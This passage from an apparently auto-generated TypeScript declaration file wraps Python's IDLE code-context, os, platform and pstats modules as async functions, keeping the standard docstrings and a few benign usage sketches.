get_line_info$({ codeline }): Promise<any>\n\n\t\t/**\n\t\t * Display block context above the edit window.\n\t\t */\n\n\t\t/**\n\t\t * Initialize settings for context block.\n\t\t * \n\t\t * editwin is the Editor window for the context block.\n\t\t * self.text is the editor window text widget.\n\t\t * \n\t\t * self.context displays the code context text above the editor text.\n\t\t * Initially None, it is toggled via <<toggle-code-context>>.\n\t\t * self.topvisible is the number of the top text line displayed.\n\t\t * self.info is a list of (line number, indent level, line text,\n\t\t * block keyword) tuples for the block structure above topvisible.\n\t\t * self.info[0] is initialized with a 'dummy' line which\n\t\t * starts the toplevel 'block' of the module.\n\t\t * \n\t\t * self.t1 and self.t2 are two timer events on the editor text widget to\n\t\t * monitor for changes to the context text or editor font.\n\t\t * \n\t\t */\n\t\tfunction CodeContext(editwin): Promise<ICodeContext>\n\t\tfunction CodeContext$({ editwin }): Promise<ICodeContext>\n\t\tinterface ICodeContext {\n\n\t\t\t/**\n\t\t\t * Load class variables from config.\n\t\t\t */\n\t\t\treload(): Promise<any>\n\t\t\treload$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Toggle code context display.\n\t\t\t * \n\t\t\t * If self.context doesn't exist, create it to match the size of the editor\n\t\t\t * window text (toggle on). If it does exist, destroy it (toggle off).\n\t\t\t * Return 'break' to complete the processing of the binding.\n\t\t\t * \n\t\t\t */\n\t\t\ttoggle_code_context_event(event?): Promise<any>\n\t\t\ttoggle_code_context_event$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return a list of block line tuples and the 'last' indent.\n\t\t\t * \n\t\t\t * The tuple fields are (linenum, indent, text, opener).\n\t\t\t * The list represents header lines from new_topvisible back to\n\t\t\t * stopline with successively shorter indents > stopindent.\n\t\t\t * The list is returned ordered by line number.\n\t\t\t * Last indent returned is the smallest indent observed.\n\t\t\t * \n\t\t\t */\n\t\t\tget_context(new_topvisible, stopline?, stopindent?): Promise<any>\n\t\t\tget_context$({ new_topvisible, stopline, stopindent }: { new_topvisible, stopline?, stopindent?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Update context information and lines visible in the context pane.\n\t\t\t * \n\t\t\t * No update is done if the text hasn't been scrolled. 
If the text\n\t\t\t * was scrolled, the lines that should be shown in the context will\n\t\t\t * be retrieved and the context area will be updated with the code,\n\t\t\t * up to the number of maxlines.\n\t\t\t * \n\t\t\t */\n\t\t\tupdate_code_context(): Promise<any>\n\t\t\tupdate_code_context$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Show clicked context line at top of editor.\n\t\t\t * \n\t\t\t * If a selection was made, don't jump; allow copying.\n\t\t\t * If no visible context, show the top line of the file.\n\t\t\t * \n\t\t\t */\n\t\t\tjumptoline(event?): Promise<any>\n\t\t\tjumptoline$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Event on editor text widget triggered every UPDATEINTERVAL ms.\n\t\t\t */\n\t\t\ttimer_event(): Promise<any>\n\t\t\ttimer_event$($: {}): Promise<any>\n\t\t\tupdate_font(): Promise<any>\n\t\t\tupdate_font$($: {}): Promise<any>\n\t\t\tupdate_highlight_colors(): Promise<any>\n\t\t\tupdate_highlight_colors$($: {}): Promise<any>\n\t\t\tUPDATEINTERVAL\n\t\t}\n\t\tlet BLOCKOPENERS: Promise<any>\n\t}\n\tmodule statusbar {\n\t\tvar _\n\t\tfunction MultiStatusBar(master): Promise<IMultiStatusBar>\n\t\tfunction MultiStatusBar$({ master }): Promise<IMultiStatusBar>\n\t\tinterface IMultiStatusBar {\n\t\t\tset_label(name, text?, side?, width?): Promise<any>\n\t\t\tset_label$({ name, text, side, width }: { name, text?, side?, width?}): Promise<any>\n\t\t}\n\t}\n}\ndeclare module os {\n\tvar _\n\n\t/**\n\t * makedirs(name [, mode=0o777][, exist_ok=False])\n\t * \n\t * Super-mkdir; create a leaf directory and all intermediate ones. Works like\n\t * mkdir, except that any intermediate path segment (not just the rightmost)\n\t * will be created if it does not exist. If the target directory already\n\t * exists, raise an OSError if exist_ok is False. Otherwise no exception is\n\t * raised. This is recursive.\n\t * \n\t * \n\t */\n\tfunction makedirs(name, mode?, exist_ok?: boolean): Promise<any>\n\tfunction makedirs$({ name, mode, exist_ok }: { name, mode?, exist_ok?}): Promise<any>\n\n\t/**\n\t * removedirs(name)\n\t * \n\t * Super-rmdir; remove a leaf directory and all empty intermediate\n\t * ones. Works like rmdir except that, if the leaf directory is\n\t * successfully removed, directories corresponding to rightmost path\n\t * segments will be pruned away until either the whole path is\n\t * consumed or an error occurs. Errors during this latter phase are\n\t * ignored -- they generally mean that a directory was not empty.\n\t * \n\t * \n\t */\n\tfunction removedirs(name): Promise<any>\n\tfunction removedirs$({ name }): Promise<any>\n\n\t/**\n\t * renames(old, new)\n\t * \n\t * Super-rename; create directories as necessary and delete any left\n\t * empty. Works like rename, except creation of any intermediate\n\t * directories needed to make the new pathname good is attempted\n\t * first. After the rename, directories corresponding to rightmost\n\t * path segments of the old name will be pruned until either the\n\t * whole path is consumed or a nonempty directory is found.\n\t * \n\t * Note: this function can fail with the new directory structure made\n\t * if you lack permissions needed to unlink the leaf directory or\n\t * file.\n\t * \n\t * \n\t */\n\tfunction renames(old, New): Promise<any>\n\tfunction renames$({ old, New }): Promise<any>\n\n\t/**\n\t * Directory tree generator.\n\t * \n\t * For each directory in the directory tree rooted at top (including top\n\t * itself, but excluding '.' 
and '..'), yields a 3-tuple\n\t * \n\t * dirpath, dirnames, filenames\n\t * \n\t * dirpath is a string, the path to the directory. dirnames is a list of\n\t * the names of the subdirectories in dirpath (excluding '.' and '..').\n\t * filenames is a list of the names of the non-directory files in dirpath.\n\t * Note that the names in the lists are just names, with no path components.\n\t * To get a full path (which begins with top) to a file or directory in\n\t * dirpath, do os.path.join(dirpath, name).\n\t * \n\t * If optional arg 'topdown' is true or not specified, the triple for a\n\t * directory is generated before the triples for any of its subdirectories\n\t * (directories are generated top down). If topdown is false, the triple\n\t * for a directory is generated after the triples for all of its\n\t * subdirectories (directories are generated bottom up).\n\t * \n\t * When topdown is true, the caller can modify the dirnames list in-place\n\t * (e.g., via del or slice assignment), and walk will only recurse into the\n\t * subdirectories whose names remain in dirnames; this can be used to prune the\n\t * search, or to impose a specific order of visiting. Modifying dirnames when\n\t * topdown is false has no effect on the behavior of os.walk(), since the\n\t * directories in dirnames have already been generated by the time dirnames\n\t * itself is generated. No matter the value of topdown, the list of\n\t * subdirectories is retrieved before the tuples for the directory and its\n\t * subdirectories are generated.\n\t * \n\t * By default errors from the os.scandir() call are ignored. If\n\t * optional arg 'onerror' is specified, it should be a function; it\n\t * will be called with one argument, an OSError instance. It can\n\t * report the error to continue with the walk, or raise the exception\n\t * to abort the walk. Note that the filename is available as the\n\t * filename attribute of the exception object.\n\t * \n\t * By default, os.walk does not follow symbolic links to subdirectories on\n\t * systems that support them. In order to get this functionality, set the\n\t * optional argument 'followlinks' to true.\n\t * \n\t * Caution: if you pass a relative pathname for top, don't change the\n\t * current working directory between resumptions of walk. 
walk never\n\t * changes the current directory, and assumes that the client doesn't\n\t * either.\n\t * \n\t * Example:\n\t * \n\t * import os\n\t * from os.path import join, getsize\n\t * for root, dirs, files in os.walk('python/Lib/email'):\n\t * print(root, \"consumes\", end=\"\")\n\t * print(sum(getsize(join(root, name)) for name in files), end=\"\")\n\t * print(\"bytes in\", len(files), \"non-directory files\")\n\t * if 'CVS' in dirs:\n\t * dirs.remove('CVS') # don't visit CVS directories\n\t * \n\t * \n\t */\n\tfunction walk(top, topdown?: boolean, onerror?, followlinks?: boolean): Promise<any>\n\tfunction walk$({ top, topdown, onerror, followlinks }: { top, topdown?, onerror?, followlinks?}): Promise<any>\n\n\t/**\n\t * Directory tree generator.\n\t * \n\t * This behaves exactly like walk(), except that it yields a 4-tuple\n\t * \n\t * dirpath, dirnames, filenames, dirfd\n\t * \n\t * `dirpath`, `dirnames` and `filenames` are identical to walk() output,\n\t * and `dirfd` is a file descriptor referring to the directory `dirpath`.\n\t * \n\t * The advantage of fwalk() over walk() is that it's safe against symlink\n\t * races (when follow_symlinks is False).\n\t * \n\t * If dir_fd is not None, it should be a file descriptor open to a directory,\n\t * and top should be relative; top will then be relative to that directory.\n\t * (dir_fd is always supported for fwalk.)\n\t * \n\t * Caution:\n\t * Since fwalk() yields file descriptors, those are only valid until the\n\t * next iteration step, so you should dup() them if you want to keep them\n\t * for a longer period.\n\t * \n\t * Example:\n\t * \n\t * import os\n\t * for root, dirs, files, rootfd in os.fwalk('python/Lib/email'):\n\t * print(root, \"consumes\", end=\"\")\n\t * print(sum(os.stat(name, dir_fd=rootfd).st_size for name in files),\n\t * end=\"\")\n\t * print(\"bytes in\", len(files), \"non-directory files\")\n\t * if 'CVS' in dirs:\n\t * dirs.remove('CVS') # don't visit CVS directories\n\t * \n\t */\n\tfunction fwalk(top?, topdown?: boolean, onerror?): Promise<any>\n\tfunction fwalk$({ top, topdown, onerror }: { top?, topdown?, onerror?}): Promise<any>\n\n\t/**\n\t * execl(file, *args)\n\t * \n\t * Execute the executable file with argument list args, replacing the\n\t * current process. \n\t */\n\tfunction execl(file): Promise<any>\n\tfunction execl$({ file }): Promise<any>\n\n\t/**\n\t * execle(file, *args, env)\n\t * \n\t * Execute the executable file with argument list args and\n\t * environment env, replacing the current process. \n\t */\n\tfunction execle(file): Promise<any>\n\tfunction execle$({ file }): Promise<any>\n\n\t/**\n\t * execlp(file, *args)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args, replacing the current process. \n\t */\n\tfunction execlp(file): Promise<any>\n\tfunction execlp$({ file }): Promise<any>\n\n\t/**\n\t * execlpe(file, *args, env)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args and environment env, replacing the current\n\t * process. \n\t */\n\tfunction execlpe(file): Promise<any>\n\tfunction execlpe$({ file }): Promise<any>\n\n\t/**\n\t * execvp(file, args)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args, replacing the current process.\n\t * args may be a list or tuple of strings. 
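\n\t * \n\t * Hypothetical usage sketch (assumes the bridged os module is in scope\n\t * and that these generated wrappers forward the call to a Python runtime):\n\t * \n\t * await os.execvp('ls', ['ls', '-l'])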
\n\t */\n\tfunction execvp(file, args): Promise<any>\n\tfunction execvp$({ file, args }): Promise<any>\n\n\t/**\n\t * execvpe(file, args, env)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args and environment env, replacing the\n\t * current process.\n\t * args may be a list or tuple of strings. \n\t */\n\tfunction execvpe(file, args, env): Promise<any>\n\tfunction execvpe$({ file, args, env }): Promise<any>\n\n\t/**\n\t * Returns the sequence of directories that will be searched for the\n\t * named executable (similar to a shell) when launching a process.\n\t * \n\t * *env* must be an environment variable dict or None. If *env* is None,\n\t * os.environ will be used.\n\t * \n\t */\n\tfunction get_exec_path(env?): Promise<any>\n\tfunction get_exec_path$({ env }: { env?}): Promise<any>\n\n\t/**\n\t * Get an environment variable, return None if it doesn't exist.\n\t * The optional second argument can specify an alternate default.\n\t * key, default and the result are str.\n\t */\n\tfunction getenv(key, def?): Promise<any>\n\tfunction getenv$({ key, def }: { key, def?}): Promise<any>\n\n\t/**\n\t * Get an environment variable, return None if it doesn't exist.\n\t * The optional second argument can specify an alternate default.\n\t * key, default and the result are bytes.\n\t */\n\tfunction getenvb(key, def?): Promise<any>\n\tfunction getenvb$({ key, def }: { key, def?}): Promise<any>\n\n\t/**\n\t * spawnv(mode, file, args) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnv(mode, file, args): Promise<any>\n\tfunction spawnv$({ mode, file, args }): Promise<any>\n\n\t/**\n\t * spawnve(mode, file, args, env) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess with the\n\t * specified environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnve(mode, file, args, env): Promise<any>\n\tfunction spawnve$({ mode, file, args, env }): Promise<any>\n\n\t/**\n\t * spawnvp(mode, file, args) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnvp(mode, file, args): Promise<any>\n\tfunction spawnvp$({ mode, file, args }): Promise<any>\n\n\t/**\n\t * spawnvpe(mode, file, args, env) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. 
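\n\t * \n\t * Hypothetical usage sketch; note that constants such as P_NOWAIT are\n\t * themselves declared as Promise values in this file:\n\t * \n\t * const pid = await os.spawnvpe(await os.P_NOWAIT, 'env', ['env'], { PATH: '/usr/bin' })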
\n\t */\n\tfunction spawnvpe(mode, file, args, env): Promise<any>\n\tfunction spawnvpe$({ mode, file, args, env }): Promise<any>\n\n\t/**\n\t * spawnl(mode, file, *args) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnl(mode, file): Promise<any>\n\tfunction spawnl$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnle(mode, file, *args, env) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess with the\n\t * supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnle(mode, file): Promise<any>\n\tfunction spawnle$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnlp(mode, file, *args) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnlp(mode, file): Promise<any>\n\tfunction spawnlp$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnlpe(mode, file, *args, env) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. 
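\n\t * \n\t * Hypothetical sketch of the $-suffixed variant, which mirrors Python\n\t * keyword arguments with a single destructured object parameter:\n\t * \n\t * await os.spawnlpe$({ mode: await os.P_WAIT, file: 'env' })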
\n\t */\n\tfunction spawnlpe(mode, file): Promise<any>\n\tfunction spawnlpe$({ mode, file }): Promise<any>\n\tfunction popen(cmd, mode?, buffering?): Promise<any>\n\tfunction popen$({ cmd, mode, buffering }: { cmd, mode?, buffering?}): Promise<any>\n\tfunction fdopen(fd, mode?, buffering?, encoding?): Promise<any>\n\tfunction fdopen$({ fd, mode, buffering, encoding }: { fd, mode?, buffering?, encoding?}): Promise<any>\n\n\t/**\n\t * Add a path to the DLL search path.\n\t * \n\t * This search path is used when resolving dependencies for imported\n\t * extension modules (the module itself is resolved through sys.path),\n\t * and also by ctypes.\n\t * \n\t * Remove the directory by calling close() on the returned object or\n\t * using it in a with statement.\n\t * \n\t */\n\tfunction add_dll_directory(path): Promise<any>\n\tfunction add_dll_directory$({ path }): Promise<any>\n\tinterface I_Environ {\n\t\tcopy(): Promise<any>\n\t\tcopy$($: {}): Promise<any>\n\t\tsetdefault(key, value): Promise<any>\n\t\tsetdefault$({ key, value }): Promise<any>\n\t}\n\tinterface I_wrap_close {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Abstract base class for implementing the file system path protocol.\n\t */\n\tinterface IPathLike {\n\t}\n\tinterface I_AddedDllDirectory {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tlet GenericAlias: Promise<any>\n\tlet name: Promise<any>\n\tlet linesep: Promise<any>\n\tlet supports_dir_fd: Promise<any>\n\tlet supports_effective_ids: Promise<any>\n\tlet supports_fd: Promise<any>\n\tlet supports_follow_symlinks: Promise<any>\n\tlet SEEK_SET: Promise<any>\n\tlet SEEK_CUR: Promise<any>\n\tlet SEEK_END: Promise<any>\n\tlet environ: Promise<any>\n\tlet supports_bytes_environ: Promise<any>\n\tlet environb: Promise<any>\n\tlet P_WAIT: Promise<any>\n\tlet P_NOWAIT: Promise<any>\n\tlet P_NOWAITO: Promise<any>\n\tlet fspath: Promise<any>\n}\ndeclare module platform {\n\tvar _\n\n\t/**\n\t * Tries to determine the libc version that the file executable\n\t * (which defaults to the Python interpreter) is linked against.\n\t * \n\t * Returns a tuple of strings (lib,version) which default to the\n\t * given parameters in case the lookup fails.\n\t * \n\t * Note that the function has intimate knowledge of how different\n\t * libc versions add symbols to the executable and thus is probably\n\t * only usable for executables compiled using gcc.\n\t * \n\t * The file is read and scanned in chunks of chunksize bytes.\n\t * \n\t * \n\t */\n\tfunction libc_ver(executable?, lib?, version?, chunksize?): Promise<any>\n\tfunction libc_ver$({ executable, lib, version, chunksize }: { executable?, lib?, version?, chunksize?}): Promise<any>\n\tfunction win32_is_iot(): Promise<any>\n\tfunction win32_is_iot$($: {}): Promise<any>\n\tfunction win32_edition(): Promise<any>\n\tfunction win32_edition$($: {}): Promise<any>\n\tfunction win32_ver(release?, version?, csd?, ptype?): Promise<any>\n\tfunction win32_ver$({ release, version, csd, ptype }: { release?, version?, csd?, ptype?}): Promise<any>\n\n\t/**\n\t * Get macOS version information and return it as tuple (release,\n\t * versioninfo, machine) with versioninfo being a tuple (version,\n\t * dev_stage, non_release_version).\n\t * \n\t * Entries which cannot be determined are set to the parameter values\n\t * which default to ''. 
All tuple entries are strings.\n\t * \n\t */\n\tfunction mac_ver(release?, versioninfo?, machine?): Promise<any>\n\tfunction mac_ver$({ release, versioninfo, machine }: { release?, versioninfo?, machine?}): Promise<any>\n\n\t/**\n\t * Version interface for Jython.\n\t * \n\t * Returns a tuple (release, vendor, vminfo, osinfo) with vminfo being\n\t * a tuple (vm_name, vm_release, vm_vendor) and osinfo being a\n\t * tuple (os_name, os_version, os_arch).\n\t * \n\t * Values which cannot be determined are set to the defaults\n\t * given as parameters (which all default to '').\n\t * \n\t * \n\t */\n\tfunction java_ver(release?, vendor?, vminfo?, osinfo?): Promise<any>\n\tfunction java_ver$({ release, vendor, vminfo, osinfo }: { release?, vendor?, vminfo?, osinfo?}): Promise<any>\n\n\t/**\n\t * Returns (system, release, version) aliased to common\n\t * marketing names used for some systems.\n\t * \n\t * It also does some reordering of the information in some cases\n\t * where it would otherwise cause confusion.\n\t * \n\t * \n\t */\n\tfunction system_alias(system, release, version): Promise<any>\n\tfunction system_alias$({ system, release, version }): Promise<any>\n\n\t/**\n\t * Queries the given executable (defaults to the Python interpreter\n\t * binary) for various architecture information.\n\t * \n\t * Returns a tuple (bits, linkage) which contains information about\n\t * the bit architecture and the linkage format used for the\n\t * executable. Both values are returned as strings.\n\t * \n\t * Values that cannot be determined are returned as given by the\n\t * parameter presets. If bits is given as '', the sizeof(pointer)\n\t * (or sizeof(long) on Python version < 1.5.2) is used as\n\t * indicator for the supported pointer size.\n\t * \n\t * The function relies on the system's \"file\" command to do the\n\t * actual work. This is available on most if not all Unix\n\t * platforms. On some non-Unix platforms where the \"file\" command\n\t * does not exist and the executable is set to the Python interpreter\n\t * binary defaults from _default_architecture are used.\n\t * \n\t * \n\t */\n\tfunction architecture(executable?, bits?, linkage?): Promise<any>\n\tfunction architecture$({ executable, bits, linkage }: { executable?, bits?, linkage?}): Promise<any>\n\n\t/**\n\t * Fairly portable uname interface. Returns a tuple\n\t * of strings (system, node, release, version, machine, processor)\n\t * identifying the underlying platform.\n\t * \n\t * Note that unlike the os.uname function this also returns\n\t * possible processor information as an additional tuple entry.\n\t * \n\t * Entries which cannot be determined are set to ''.\n\t * \n\t * \n\t */\n\tfunction uname(): Promise<any>\n\tfunction uname$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction system(): Promise<any>\n\tfunction system$($: {}): Promise<any>\n\n\t/**\n\t * Returns the computer's network name (which may not be fully\n\t * qualified)\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction node(): Promise<any>\n\tfunction node$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system's release, e.g. 
'2.2.0' or 'NT'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction release(): Promise<any>\n\tfunction release$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system's release version, e.g. '#3 on degas'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction version(): Promise<any>\n\tfunction version$($: {}): Promise<any>\n\n\t/**\n\t * Returns the machine type, e.g. 'i386'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction machine(): Promise<any>\n\tfunction machine$($: {}): Promise<any>\n\n\t/**\n\t * Returns the (true) processor name, e.g. 'amdk6'\n\t * \n\t * An empty string is returned if the value cannot be\n\t * determined. Note that many platforms do not provide this\n\t * information or simply return the same value as for machine(),\n\t * e.g. NetBSD does this.\n\t * \n\t * \n\t */\n\tfunction processor(): Promise<any>\n\tfunction processor$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation.\n\t * \n\t * Currently, the following implementations are identified:\n\t * 'CPython' (C implementation of Python),\n\t * 'IronPython' (.NET implementation of Python),\n\t * 'Jython' (Java implementation of Python),\n\t * 'PyPy' (Python implementation of Python).\n\t * \n\t * \n\t */\n\tfunction python_implementation(): Promise<any>\n\tfunction python_implementation$($: {}): Promise<any>\n\n\t/**\n\t * Returns the Python version as string 'major.minor.patchlevel'\n\t * \n\t * Note that unlike the Python sys.version, the returned value\n\t * will always include the patchlevel (it defaults to 0).\n\t * \n\t * \n\t */\n\tfunction python_version(): Promise<any>\n\tfunction python_version$($: {}): Promise<any>\n\n\t/**\n\t * Returns the Python version as tuple (major, minor, patchlevel)\n\t * of strings.\n\t * \n\t * Note that unlike the Python sys.version, the returned value\n\t * will always include the patchlevel (it defaults to 0).\n\t * \n\t * \n\t */\n\tfunction python_version_tuple(): Promise<any>\n\tfunction python_version_tuple$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation\n\t * branch.\n\t * \n\t * For CPython this is the SCM branch from which the\n\t * Python binary was built.\n\t * \n\t * If not available, an empty string is returned.\n\t * \n\t * \n\t */\n\tfunction python_branch(): Promise<any>\n\tfunction python_branch$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation\n\t * revision.\n\t * \n\t * For CPython this is the SCM revision from which the\n\t * Python binary was built.\n\t * \n\t * If not available, an empty string is returned.\n\t * \n\t * \n\t */\n\tfunction python_revision(): Promise<any>\n\tfunction python_revision$($: {}): Promise<any>\n\n\t/**\n\t * Returns a tuple (buildno, builddate) stating the Python\n\t * build number and date as strings.\n\t * \n\t * \n\t */\n\tfunction python_build(): Promise<any>\n\tfunction python_build$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the compiler used for compiling\n\t * Python.\n\t * \n\t * \n\t */\n\tfunction python_compiler(): Promise<any>\n\tfunction python_compiler$($: {}): Promise<any>\n\n\t/**\n\t * Returns a single string identifying the underlying platform\n\t * with as much useful information as possible (but no more :).\n\t * \n\t * The output is intended to be human readable rather than\n\t * machine 
parseable. It may look different on different\n\t * platforms and this is intended.\n\t * \n\t * If \"aliased\" is true, the function will use aliases for\n\t * various platforms that report system names which differ from\n\t * their common names, e.g. SunOS will be reported as\n\t * Solaris. The system_alias() function is used to implement\n\t * this.\n\t * \n\t * Setting terse to true causes the function to return only the\n\t * absolute minimum information needed to identify the platform.\n\t * \n\t * \n\t */\n\tfunction platform(aliased?, terse?): Promise<any>\n\tfunction platform$({ aliased, terse }: { aliased?, terse?}): Promise<any>\n\n\t/**\n\t * Return operating system identification from freedesktop.org os-release\n\t * \n\t */\n\tfunction freedesktop_os_release(): Promise<any>\n\tfunction freedesktop_os_release$($: {}): Promise<any>\n\tinterface I_Processor {\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t\tget_win32(): Promise<any>\n\t\tget_win32$($: {}): Promise<any>\n\t\tget_OpenVMS(): Promise<any>\n\t\tget_OpenVMS$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Fall back to `uname -p`\n\t\t * \n\t\t */\n\t\tfrom_subprocess(): Promise<any>\n\t\tfrom_subprocess$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A uname_result that's largely compatible with a\n\t * simple namedtuple except that 'processor' is\n\t * resolved late and cached to avoid calling \"uname\"\n\t * except when needed.\n\t * \n\t */\n\tinterface Iuname_result {\n\t\tprocessor(): Promise<any>\n\t\tprocessor$($: {}): Promise<any>\n\t}\n\tlet terse: Promise<any>\n\tlet aliased: Promise<any>\n}\ndeclare module pstats {\n\tvar _\n\tfunction func_strip_path(func_name): Promise<any>\n\tfunction func_strip_path$({ func_name }): Promise<any>\n\tfunction func_get_function_name(func): Promise<any>\n\tfunction func_get_function_name$({ func }): Promise<any>\n\tfunction func_std_string(func_name): Promise<any>\n\tfunction func_std_string$({ func_name }): Promise<any>\n\n\t/**\n\t * Add together all the stats for two profile entries.\n\t */\n\tfunction add_func_stats(target, source): Promise<any>\n\tfunction add_func_stats$({ target, source }): Promise<any>\n\n\t/**\n\t * Combine two caller lists in a single list.\n\t */\n\tfunction add_callers(target, source): Promise<any>\n\tfunction add_callers$({ target, source }): Promise<any>\n\n\t/**\n\t * Sum the caller statistics to get total number of calls received.\n\t */\n\tfunction count_calls(callers): Promise<any>\n\tfunction count_calls$({ callers }): Promise<any>\n\tfunction f8(x): Promise<any>\n\tfunction f8$({ x }): Promise<any>\n\tinterface ISortKey {\n\t\tCALLS\n\t\tCUMULATIVE\n\t\tFILENAME\n\t\tLINE\n\t\tNAME\n\t\tNFL\n\t\tPCALLS\n\t\tSTDNAME\n\t\tTIME\n\t}\n\tinterface IFunctionProfile {\n\t}\n\n\t/**\n\t * Holds a mapping of function names to FunctionProfile instances.\n\t */\n\tinterface IStatsProfile {\n\t}\n\n\t/**\n\t * This class is used for creating reports from data generated by the\n\t * Profile class. It is a \"friend\" of that class, and imports data either\n\t * by direct access to members of Profile class, or by reading in a dictionary\n\t * that was emitted (via marshal) from the Profile class.\n\t * \n\t * The big change from the previous Profiler (in terms of raw functionality)\n\t * is that an \"add()\" method has been provided to combine Stats from\n\t * several distinct profile runs. 
Both the constructor and the add()\n\t * method now take arbitrarily many file names as arguments.\n\t * \n\t * All the print methods now take an argument that indicates how many lines\n\t * to print. If the arg is a floating point number between 0 and 1.0, then\n\t * it is taken as a decimal percentage of the available lines to be printed\n\t * (e.g., .1 means print 10% of all available lines). If it is an integer,\n\t * it is taken to mean the number of lines of data that you wish to have\n\t * printed.\n\t * \n\t * The sort_stats() method now processes some additional options (i.e., in\n\t * addition to the old -1, 0, 1, or 2 that are respectively interpreted as\n\t * 'stdname', 'calls', 'time', and 'cumulative'). It takes either an\n\t * arbitrary number of quoted strings or SortKey enum to select the sort\n\t * order.\n\t * \n\t * For example sort_stats('time', 'name') or sort_stats(SortKey.TIME,\n\t * SortKey.NAME) sorts on the major key of 'internal function time', and on\n\t * the minor key of 'the name of the function'. Look at the two tables in\n\t * sort_stats() and get_sort_arg_defs(self) for more examples.\n\t * \n\t * All methods return self, so you can string together commands like:\n\t * Stats('foo', 'goo').strip_dirs().sort_stats('calls'). print_stats(5).print_callers(5)\n\t * \n\t */\n\tfunction Stats(): Promise<IStats>\n\tfunction Stats$({ }): Promise<IStats>\n\tinterface IStats {\n\t\tinit(arg): Promise<any>\n\t\tinit$({ arg }): Promise<any>\n\t\tload_stats(arg): Promise<any>\n\t\tload_stats$({ arg }): Promise<any>\n\t\tget_top_level_stats(): Promise<any>\n\t\tget_top_level_stats$($: {}): Promise<any>\n\t\tadd(): Promise<any>\n\t\tadd$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Write the profile data to a file we know how to load back.\n\t\t */\n\t\tdump_stats(filename): Promise<any>\n\t\tdump_stats$({ filename }): Promise<any>\n\n\t\t/**\n\t\t * Expand all abbreviations that are unique.\n\t\t */\n\t\tget_sort_arg_defs(): Promise<any>\n\t\tget_sort_arg_defs$($: {}): Promise<any>\n\t\tsort_stats(): Promise<any>\n\t\tsort_stats$($: {}): Promise<any>\n\t\treverse_order(): Promise<any>\n\t\treverse_order$($: {}): Promise<any>\n\t\tstrip_dirs(): Promise<any>\n\t\tstrip_dirs$($: {}): Promise<any>\n\t\tcalc_callees(): Promise<any>\n\t\tcalc_callees$($: {}): Promise<any>\n\t\teval_print_amount(sel, list, msg): Promise<any>\n\t\teval_print_amount$({ sel, list, msg }): Promise<any>\n\n\t\t/**\n\t\t * This method returns an instance of StatsProfile, which contains a 